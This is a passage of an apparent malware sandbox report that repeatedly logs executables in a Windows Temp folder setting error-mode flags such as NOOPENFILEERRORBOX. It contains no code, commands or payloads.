            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
